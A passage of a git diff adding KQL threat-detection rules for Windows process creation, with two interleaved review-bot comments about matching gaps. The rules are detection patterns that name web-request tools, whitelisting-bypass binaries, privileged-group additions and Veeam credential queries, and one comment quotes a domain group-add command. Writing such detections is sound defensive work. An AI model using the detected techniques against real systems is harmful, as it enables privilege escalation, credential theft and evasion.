+// Title: Unmount Share Via Net.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2020-10-08
+// Level: low
+// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+// False Positives:
+// - Administrators or Power users may remove their shares via cmd line
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql
new file mode 100644
index 00000000..bdbe7cfb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unsigned_appx_installation_attempt_using_add_appxpackage.kql
@@ -0,0 +1,12 @@
+// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-31
+// Level: medium
+// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+// False Positives:
+// - Installation of unsigned packages for testing purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql b/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql
new file mode 100644
index 00000000..b439e876
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unusual_child_process_of_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual Child Process of dns.exe
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql
new file mode 100644
index 00000000..0c4781c7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/unusual_parent_process_for_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual Parent Process For Cmd.EXE
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-21
+// Level: medium
+// Description: Detects suspicious parent process for cmd.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql
new file mode 100644
index 00000000..4470135b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/usage_of_web_request_commands_and_cmdlets.kql
@@ -0,0 +1,12 @@
+// Title: Usage Of Web Request Commands And Cmdlets
+// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql
new file mode 100644
index 00000000..703f96e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/use_icacls_to_hide_file_to_everyone.kql
@@ -0,0 +1,10 @@ +// Title: Use Icacls to Hide File to Everyone +// Author: frack113 +// Date: 2022-07-18 +// Level: medium +// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql new file mode 100644 index 00000000..f9359f4f --- /dev/null +++ b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_command_line.kql 
@@ -0,0 +1,12 @@ +// Title: Use NTFS Short Name in Command Line +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. + +DeviceProcessEvents +| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql new file mode 100644 index 00000000..c8eaec20 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_ntfs_short_name_in_image.kql 
@@ -0,0 +1,12 @@ +// Title: Use NTFS Short Name in Image +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-06 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Software Installers + +DeviceProcessEvents +| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql b/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql new file mode 100644 index 00000000..26f958b5 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_fsharp_interpreters.kql 
@@ -0,0 +1,13 @@ +// Title: Use of FSharp Interpreters +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" +// Both can be used for AWL bypass and to execute F# code via scripts or inline. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a software developer. + +DeviceProcessEvents +| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_openconsole.kql b/KQL/rules/windows/process_creation/use_of_openconsole.kql new file mode 100644 index 00000000..fe0deb3a --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_openconsole.kql @@ -0,0 +1,12 @@ +// Title: Use of OpenConsole +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by an administrator + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql b/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql new file mode 100644 index 00000000..baaccf74 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_pcalua_for_execution.kql 
@@ -0,0 +1,12 @@ +// Title: Use of Pcalua For Execution +// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a via a batch script or by an administrator. + +DeviceProcessEvents +| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_remote_exe.kql b/KQL/rules/windows/process_creation/use_of_remote_exe.kql new file mode 100644 index 00000000..879e9f91 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_remote_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of Remote.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). + +DeviceProcessEvents +| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql b/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql new file mode 100644 index 00000000..944937e1 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Use of Scriptrunner.exe +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-01 +// Level: medium +// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Legitimate use when App-v is deployed + +DeviceProcessEvents +| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql new file mode 100644 index 00000000..416722e3 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql @@ -0,0 +1,10 @@ +// Title: Use Of The SFTP.EXE Binary As A LOLBIN +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-10 +// Level: medium +// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql b/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql new file mode 100644 index 00000000..5fe53ce7 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Use of TTDInject.exe +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql b/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql new file mode 100644 index 00000000..34381a05 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql @@ -0,0 +1,12 @@ +// Title: Use of UltraVNC Remote Access Software +// Author: frack113 +// Date: 2022-10-02 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "VNCViewer" or ProcessVersionInfoProductName =~ "UltraVNC VNCViewer" or ProcessVersionInfoCompanyName =~ "UltraVNC" or ProcessVersionInfoOriginalFileName =~ "VNCViewer.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql b/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql new file mode 100644 index 00000000..96eafd5f --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql 
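Review bot: The image match in the TTDInject rule is `FolderPath endswith "ttdinject.exe"` with no leading backslash, unlike every other rule in this batch (`"\\remote.exe"`, `"\\wfc.exe"`, `"\\VisualUiaVerifyNative.exe"`), so any executable whose file name merely ends in that string also matches. If the upstream Sigma pattern has no backslash this is inherited rather than a conversion error, but the tighter form is `FolderPath endswith "\\ttdinject.exe"`. The `ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"` alternative already covers renamed copies, so anchoring on the path separator loses nothing.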
@@ -0,0 +1,12 @@ +// Title: Use of VisualUiaVerifyNative.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-01 +// Level: medium +// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate testing of Microsoft UI parts. + +DeviceProcessEvents +| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql b/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql new file mode 100644 index 00000000..75a70dc7 --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql @@ -0,0 +1,10 @@ +// Title: Use of VSIISExeLauncher.exe +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: medium +// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql b/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql new file mode 100644 index 00000000..bbc2164c --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql 
@@ -0,0 +1,12 @@ +// Title: Use of W32tm as Timer +// Author: frack113 +// Date: 2022-09-25 +// Level: high +// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1124 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_of_wfc_exe.kql b/KQL/rules/windows/process_creation/use_of_wfc_exe.kql new file mode 100644 index 00000000..10806bbe --- /dev/null +++ b/KQL/rules/windows/process_creation/use_of_wfc_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of Wfc.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-01 +// Level: medium +// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use by a software developer + +DeviceProcessEvents +| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql b/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql new file mode 100644 index 00000000..b47db9bf --- /dev/null +++ b/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql 
@@ -0,0 +1,12 @@ +// Title: Use Short Name Path in Image +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-07 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. + +DeviceProcessEvents +| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe"))))) and (not(((ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql b/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql new file mode 100644 index 00000000..644ac225 --- /dev/null +++ b/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql 
@@ -0,0 +1,12 @@ +// Title: User Added To Highly Privileged Group +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: high +// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 +// False Positives: +// - Administrative activity that must be investigated + +DeviceProcessEvents +| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql b/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql new file mode 100644 index 00000000..5d365188 --- /dev/null +++ b/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql @@ -0,0 +1,12 @@ +// Title: User Added to Local Administrators Group +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: medium +// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1098 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file 
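Review bot: Both group names in the "User Added To Highly Privileged Group" rule (`Group Policy Creator Owners`, `Schema Admins`) are domain groups, yet the command half of the query only matches local-group operations (`localgroup ` with ` /add`, or `Add-LocalGroupMember `), so the usual `net group "Schema Admins" <user> /add /domain` contains neither string and is not detected. If the upstream Sigma selection is identical the gap is inherited; if it also lists a `group ` variant, the converter dropped an alternative — worth confirming against the source rule before merging, since the description claims coverage of these groups. A minimal extension would be `or (ProcessCommandLine contains " group " and ProcessCommandLine contains " /add")`, and presumably `Add-ADGroupMember` for the PowerShell path.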
diff --git a/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql b/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql new file mode 100644 index 00000000..8ba2f5e3 --- /dev/null +++ b/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql @@ -0,0 +1,12 @@ +// Title: User Added to Remote Desktop Users Group +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-06 +// Level: high +// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql new file mode 100644 index 00000000..c5f6fa7c --- /dev/null +++ b/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql 
@@ -0,0 +1,12 @@ +// Title: User Discovery And Export Via Get-ADUser Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 +// False Positives: +// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often + +DeviceProcessEvents +| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql new file mode 100644 index 00000000..2f652946 --- /dev/null +++ b/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql 
@@ -0,0 +1,10 @@ +// Title: Using SettingSyncHost.exe as LOLBin +// Author: Anton Kutepov, oscd.community +// Date: 2020-02-05 +// Level: high +// Description: Detects using SettingSyncHost.exe to run hijacked binary +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008 + +DeviceProcessEvents +| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql new file mode 100644 index 00000000..a7ca7eff --- /dev/null +++ b/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql @@ -0,0 +1,10 @@ +// Title: UtilityFunctions.ps1 Proxy Dll +// Author: frack113 +// Date: 2022-05-28 +// Level: medium +// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin " \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql b/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql new file mode 100644 index 00000000..2aafc9c5 --- /dev/null +++ b/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql 
@@ -0,0 +1,10 @@ +// Title: Veeam Backup Database Suspicious Query +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: medium +// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql new file mode 100644 index 00000000..ecb12649 --- /dev/null 